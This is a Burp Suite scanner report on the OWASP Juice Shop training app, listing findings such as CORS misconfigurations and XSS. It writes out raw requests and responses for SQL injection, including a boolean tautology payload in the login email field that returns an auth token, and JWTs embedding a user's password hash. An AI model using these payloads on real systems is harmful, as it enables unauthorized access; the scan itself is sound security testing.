Juice Shop Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

    Confidence
    Certain Firm Tentative Total
Severity High 5 2 2 9
Medium 1 0 1 2
Low 8 1 0 9
Information 199 2 0 201

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

    Number of issues
    0 50 100 150 200
Severity High
 
Medium
 
Low
 
Information
 

Contents

1. SQL injection

1.1. http://192.168.61.143:3000/rest/product/search [q parameter]

1.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

2. Cross-origin resource sharing: arbitrary origin trusted

2.1. http://192.168.61.143:3000/socket.io/

2.2. http://192.168.61.143:3000/

2.3. http://192.168.61.143:3000/api/BasketItems/

2.4. http://192.168.61.143:3000/api/BasketItems/7

2.5. http://192.168.61.143:3000/api/BasketItems/8

2.6. http://192.168.61.143:3000/api/Complaints/

2.7. http://192.168.61.143:3000/api/Feedbacks/

2.8. http://192.168.61.143:3000/api/Products/1

2.9. http://192.168.61.143:3000/api/Products/18

2.10. http://192.168.61.143:3000/api/Products/2

2.11. http://192.168.61.143:3000/api/Products/6

2.12. http://192.168.61.143:3000/api/Products/8

2.13. http://192.168.61.143:3000/api/Users/

2.14. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

2.15. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

2.16. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

2.17. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

2.18. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

2.19. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

2.20. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

2.21. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

2.22. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

2.23. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

2.24. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

2.25. http://192.168.61.143:3000/bower_components/angular/angular.min.js

2.26. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

2.27. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

2.28. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

2.29. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

2.30. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

2.31. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

2.32. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

2.33. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

2.34. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

2.35. http://192.168.61.143:3000/bower_components/underscore/underscore.js

2.36. http://192.168.61.143:3000/css/app.css

2.37. http://192.168.61.143:3000/dist/juice-shop.min.js

2.38. http://192.168.61.143:3000/i18n/en.json

2.39. http://192.168.61.143:3000/i18n/en_US.json

2.40. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

2.41. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

2.42. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

2.43. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

2.44. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

2.45. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

2.46. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

2.47. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

2.48. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

2.49. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

2.50. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

2.51. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

2.52. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

2.53. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

2.54. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

2.55. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

2.56. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

2.57. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

2.58. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

2.59. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

2.60. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

2.61. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

2.62. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

2.63. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

2.64. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

2.65. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

2.66. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

2.67. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

2.68. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

2.69. http://192.168.61.143:3000/public/images/products/css/app.css

2.70. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

2.71. http://192.168.61.143:3000/redirect

2.72. http://192.168.61.143:3000/rest/admin/application-version

2.73. http://192.168.61.143:3000/rest/basket/4

2.74. http://192.168.61.143:3000/rest/basket/4/checkout

2.75. http://192.168.61.143:3000/rest/product/search

2.76. http://192.168.61.143:3000/rest/user/login

2.77. http://192.168.61.143:3000/rest/user/whoami

3. Cleartext submission of password

3.1. http://192.168.61.143:3000/dist/juice-shop.min.js

3.2. http://192.168.61.143:3000/dist/juice-shop.min.js

3.3. http://192.168.61.143:3000/dist/juice-shop.min.js

4. Interesting input handling: SQLite injection

4.1. http://192.168.61.143:3000/rest/product/search [q parameter]

4.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

5. Local File Include

6. Cross-site request forgery

7. The JavaScript file 'jquery.min.js' includes a vulnerable version of the library 'jquery'

8. Password submitted using GET method

8.1. http://192.168.61.143:3000/dist/juice-shop.min.js

8.2. http://192.168.61.143:3000/dist/juice-shop.min.js

8.3. http://192.168.61.143:3000/dist/juice-shop.min.js

9. Open redirection

10. Password field with autocomplete enabled

10.1. http://192.168.61.143:3000/dist/juice-shop.min.js

10.2. http://192.168.61.143:3000/dist/juice-shop.min.js

10.3. http://192.168.61.143:3000/dist/juice-shop.min.js

11. Content type incorrectly stated

12. Unencrypted communications

13. Cross-site scripting (stored)

14. Cross-site scripting (reflected)

14.1. http://192.168.61.143:3000/api/BasketItems/ [BasketId JSON parameter]

14.2. http://192.168.61.143:3000/api/BasketItems/ [ProductId JSON parameter]

14.3. http://192.168.61.143:3000/api/BasketItems/ [quantity JSON parameter]

14.4. http://192.168.61.143:3000/api/BasketItems/ [request body]

14.5. http://192.168.61.143:3000/api/Complaints/ [UserId JSON parameter]

14.6. http://192.168.61.143:3000/api/Complaints/ [message JSON parameter]

14.7. http://192.168.61.143:3000/api/Complaints/ [request body]

14.8. http://192.168.61.143:3000/api/Feedbacks/ [UserId JSON parameter]

14.9. http://192.168.61.143:3000/api/Feedbacks/ [comment JSON parameter]

14.10. http://192.168.61.143:3000/api/Feedbacks/ [name of an arbitrarily supplied URL parameter]

14.11. http://192.168.61.143:3000/api/Feedbacks/ [rating JSON parameter]

14.12. http://192.168.61.143:3000/api/Feedbacks/ [request body]

14.13. http://192.168.61.143:3000/api/Users/ [email JSON parameter]

14.14. http://192.168.61.143:3000/api/Users/ [request body]

14.15. http://192.168.61.143:3000/rest/user/login [request body]

15. Cross-origin resource sharing

15.1. http://192.168.61.143:3000/

15.2. http://192.168.61.143:3000/api/BasketItems/

15.3. http://192.168.61.143:3000/api/BasketItems/7

15.4. http://192.168.61.143:3000/api/BasketItems/8

15.5. http://192.168.61.143:3000/api/Complaints/

15.6. http://192.168.61.143:3000/api/Feedbacks/

15.7. http://192.168.61.143:3000/api/Products/1

15.8. http://192.168.61.143:3000/api/Products/12

15.9. http://192.168.61.143:3000/api/Products/18

15.10. http://192.168.61.143:3000/api/Products/2

15.11. http://192.168.61.143:3000/api/Products/4

15.12. http://192.168.61.143:3000/api/Products/6

15.13. http://192.168.61.143:3000/api/Products/7

15.14. http://192.168.61.143:3000/api/Products/8

15.15. http://192.168.61.143:3000/api/Users/

15.16. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

15.17. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

15.18. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

15.19. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

15.20. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

15.21. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

15.22. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

15.23. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

15.24. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

15.25. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

15.26. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

15.27. http://192.168.61.143:3000/bower_components/angular/angular.min.js

15.28. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

15.29. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

15.30. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

15.31. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/cn.svg

15.32. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/de.svg

15.33. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ee.svg

15.34. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/es.svg

15.35. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fi.svg

15.36. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fr.svg

15.37. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/gr.svg

15.38. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/it.svg

15.39. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/jp.svg

15.40. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lt.svg

15.41. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lv.svg

15.42. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/nl.svg

15.43. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pl.svg

15.44. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pt.svg

15.45. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ru.svg

15.46. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/se.svg

15.47. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/tr.svg

15.48. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/us.svg

15.49. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

15.50. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

15.51. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

15.52. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

15.53. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

15.54. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

15.55. http://192.168.61.143:3000/bower_components/underscore/underscore.js

15.56. http://192.168.61.143:3000/css/app.css

15.57. http://192.168.61.143:3000/dist/juice-shop.min.js

15.58. http://192.168.61.143:3000/i18n/en.json

15.59. http://192.168.61.143:3000/i18n/en_US.json

15.60. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

15.61. http://192.168.61.143:3000/public/images/carousel/1.jpg

15.62. http://192.168.61.143:3000/public/images/carousel/2.jpg

15.63. http://192.168.61.143:3000/public/images/carousel/3.jpg

15.64. http://192.168.61.143:3000/public/images/carousel/4.jpg

15.65. http://192.168.61.143:3000/public/images/carousel/5.jpg

15.66. http://192.168.61.143:3000/public/images/carousel/6.jpg

15.67. http://192.168.61.143:3000/public/images/carousel/7.jpg

15.68. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

15.69. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

15.70. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

15.71. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

15.72. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

15.73. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

15.74. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

15.75. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

15.76. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

15.77. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

15.78. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

15.79. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

15.80. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

15.81. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

15.82. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

15.83. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

15.84. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

15.85. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

15.86. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

15.87. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

15.88. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

15.89. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

15.90. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

15.91. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

15.92. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

15.93. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

15.94. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

15.95. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

15.96. http://192.168.61.143:3000/public/images/products/css/app.css

15.97. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

15.98. http://192.168.61.143:3000/redirect

15.99. http://192.168.61.143:3000/rest/admin/application-version

15.100. http://192.168.61.143:3000/rest/basket/4

15.101. http://192.168.61.143:3000/rest/basket/4/checkout

15.102. http://192.168.61.143:3000/rest/product/search

15.103. http://192.168.61.143:3000/rest/user/login

15.104. http://192.168.61.143:3000/rest/user/whoami

15.105. http://192.168.61.143:3000/socket.io/

16. Cross-domain POST

17. Email addresses disclosed

18. Private IP addresses disclosed

19. HTML does not specify charset


1. SQL injection
Next

There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

References



1.1. http://192.168.61.143:3000/rest/product/search [q parameter]
Next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Issue detail

The q parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the q parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rest/product/search?q=orange' HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:13:44 GMT
Connection: close
Content-Length: 346

{
"error": {
"message": "SQLITE_ERROR: near \"'%'\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"'%'\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orange'%' OR description
...[SNIP]...

Request 2

GET /rest/product/search?q=orange'' HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:13:45 GMT
Connection: close

{"status":"success","data":[]}
1.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Issue detail

The email JSON parameter appears to be vulnerable to SQL injection attacks. The payloads 33015061' or '4679'='4679 and 33015061' or '4679'='4680 were each submitted in the email JSON parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 69
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.com33015061' or '4679'='4679","password":"juice-shop-password"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 458
ETag: W/"1ca-rqbc38c6L97tDCWVSkY5Vg"
Date: Sun, 15 Jan 2017 21:14:01 GMT
Connection: close

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDg0MSwiZXhwIjoxNDg0NTMyODQxfQ.-A7jaf5OMXCNhp1xNw8lUrQVM9iJ2BoXZCSZlvpErIc","bid":4,"umail":"mike_landeck@hotmail.com"}

Request 2

POST /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 69
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.com33015061' or '4679'='4680","password":"juice-shop-password"}

Response 2

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:01 GMT
Connection: close

Invalid email or password.
2. Cross-origin resource sharing: arbitrary origin trusted
Previous  Next

There are 77 instances of this issue:

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.

If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.

References



2.1. http://192.168.61.143:3000/socket.io/
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /socket.io/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mvguwanmgqkd.com

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /socket.io/ HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://mvguwanmgqkd.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 400 Bad Request
Content-Type: application/json
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://mvguwanmgqkd.com
Date: Sun, 15 Jan 2017 21:22:43 GMT
Connection: close
Content-Length: 40

{"code":0,"message":"Transport unknown"}
2.2. http://192.168.61.143:3000/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://xoypxvnfrrwd.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET / HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: http://xoypxvnfrrwd.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
